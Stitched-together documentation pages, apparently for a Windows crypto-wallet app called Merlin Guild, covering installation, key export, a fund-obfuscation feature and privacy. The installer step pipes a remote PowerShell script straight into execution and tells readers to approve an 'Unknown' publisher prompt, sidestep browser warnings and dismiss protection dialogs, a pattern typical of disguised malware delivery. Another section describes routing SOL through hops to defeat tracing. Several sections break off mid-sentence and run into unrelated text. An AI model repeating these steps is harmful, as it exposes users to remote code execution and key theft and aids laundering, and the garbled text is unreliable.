Have it ready before you start. ## Before you start You will need: - Windows 10 or 11 (64-bit). - Your Merlin Guild license key. - PowerShell, which is built into Windows. - A working internet connection. **Estimated time:** 5 minutes. ## How it works ### Run the install command Open **PowerShell** from the Start menu. A standard, non-admin window is fine; the installer asks for elevation only when it actually needs it. Paste this command and press Enter: ```powershell iwr https://dl.merlinguild.com/install.ps1 -UseBasicParsing | iex ``` ### Enter your license key The installer prompts you for your license key. Paste it and press Enter. Your license is then used to authorize the download and to unlock features in the app. ### Approve the install prompt Windows shows a **User Account Control** prompt to run the installer. It has a yellow shield and lists the publisher as **Unknown**. This is expected and does not mean anything is wrong: the app verifies that what you install is genuine before it runs, regardless of that label. Click **Yes**. ### Finish A progress bar appears briefly, and the installer reports that Merlin Guild is ready. Launch it from the Start menu. ## Updates There is no background auto-updater, so you stay in control of when you upgrade. To update, run the same install command again. If your license is still valid, the key prompt is skipped, the latest version downloads, and you approve the install prompt once more. ## Safety behaviours - **You choose when to update:** nothing changes on your machine until you re-run the command yourself. - **Genuine-build check:** the installer confirms the download is authentic before running it, so a tampered file cannot install. - **No browser download needed:** installing straight from PowerShell avoids the browser reputation warning you might otherwise see. ## Common issues - **Forbidden or license expired:** your key was revoked or its download window has ended. Contact support to renew it. - **A protection dialog appeared:** this should not happen on the command path above. If it does, you most likely downloaded a file from a browser instead. Close the dialog and re-run the command from PowerShell. - **A corporate network blocks the installer:** some workplace networks block downloads. The app uses it to protect your wallets and other sensitive data. Pick a strong, unique password and store it somewhere safe. ### Understand what it protects Your wallet secrets are encrypted on your own device. The master password is never saved anywhere, and your private keys are never stored in plain form. A copy of the app's data on its own is useless to anyone who does not also know your password. ### Unlock on each launch After setup, every launch shows an unlock screen. Enter your master password to open the vault for that session. The plain, usable form of a private key exists only briefly in memory while you are actively using it, and is discarded when the session locks. ## Your master password is the key The app uses your master password to unlock your vault, and that password is never stored anywhere. Because of this, a copy of the app's data on its own is not enough to access your funds: without your password on your device, the data stays locked. ## Recover access if needed The app provides a way to recover access so you are not permanently locked out by a forgotten setup, while still keeping your secrets protected. Keep any recovery information you are given somewhere safe. ## It works offline Merlin Guild does not depend on calling out to a server to let you in. Each wallet row has an **Export** action alongside its other options. ## How it works The export happens in a single window with three steps. You can cancel at any point. ### Warning When you start an export, the app first reminds you what a private key is, what can happen if it leaks, and that Merlin Guild will never ask you for it. You must confirm you understand before continuing; there is no way to skip this. ### Password confirmation Even with the app already unlocked, you re-enter your master password before the key is shown. This is a deliberate are-you-sure check, so that brief physical access to an unlocked app is not enough to walk away with your keys. ### Reveal The key appears blurred by default. To see it, you press and hold a reveal control; let go and it blurs again. A short countdown hides it automatically even if you keep holding. On this step you can: - **Switch format** to match your destination wallet, for example a format for browser wallets, one for command-line tools, or raw hex. - **Copy to clipboard**, after which the app automatically clears the clipboard a short time later. - **Download a text file** containing the key, so you can move it to offline storage. When you close the window, lock the app, or switch away, the key is wiped from memory immediately. ## Safety behaviours - **The window closes itself** if you switch to another app or the session locks; you start over. - **The key re-blurs** the moment you release the reveal control or the timer expires. - **Clipboard auto-clear** means a copied key disappears shortly after; paste it right away. - **Too many rapid export attempts are refused**, which prevents accidental or automated abuse. ## What is recorded For your own traceability, the app keeps a local history of export events: when a reveal was authorized and when it happened. Funds travel along several branches, through a chain of hops, with varied amounts and random delays, and converge on a fresh destination that has no direct history with the source. The result looks like noise to automated analysis. ## You control the path You choose how many hops and branches to use, and you can add extra branching to multiply the number of paths. More hops and branches mean a more complex graph that is harder and more expensive to untangle. You can also roll everything back to the source if you change your mind or something fails. ## No middleman The key difference from a centralized service is that there is no middleman. The intermediate wallets are created and controlled on your machine, and your keys never leave it. You do not hand your SOL to anyone to route on your behalf. ## What it does and does not do - **It does** make it difficult for automated tools to draw a clean line between your source and destination. - **It does not** make tracing impossible. The ledger is public, and someone with enough time and motivation could trace manually. We do not send private keys, wallet addresses, or any app data to Sentry. **None from the app.** The Merlin Guild desktop application is self-hosted. Your keys, wallet data, and trade history stay on your machine. We do not have access to them. ## How we use data - **Waitlist emails** are used only to send product-update notifications.
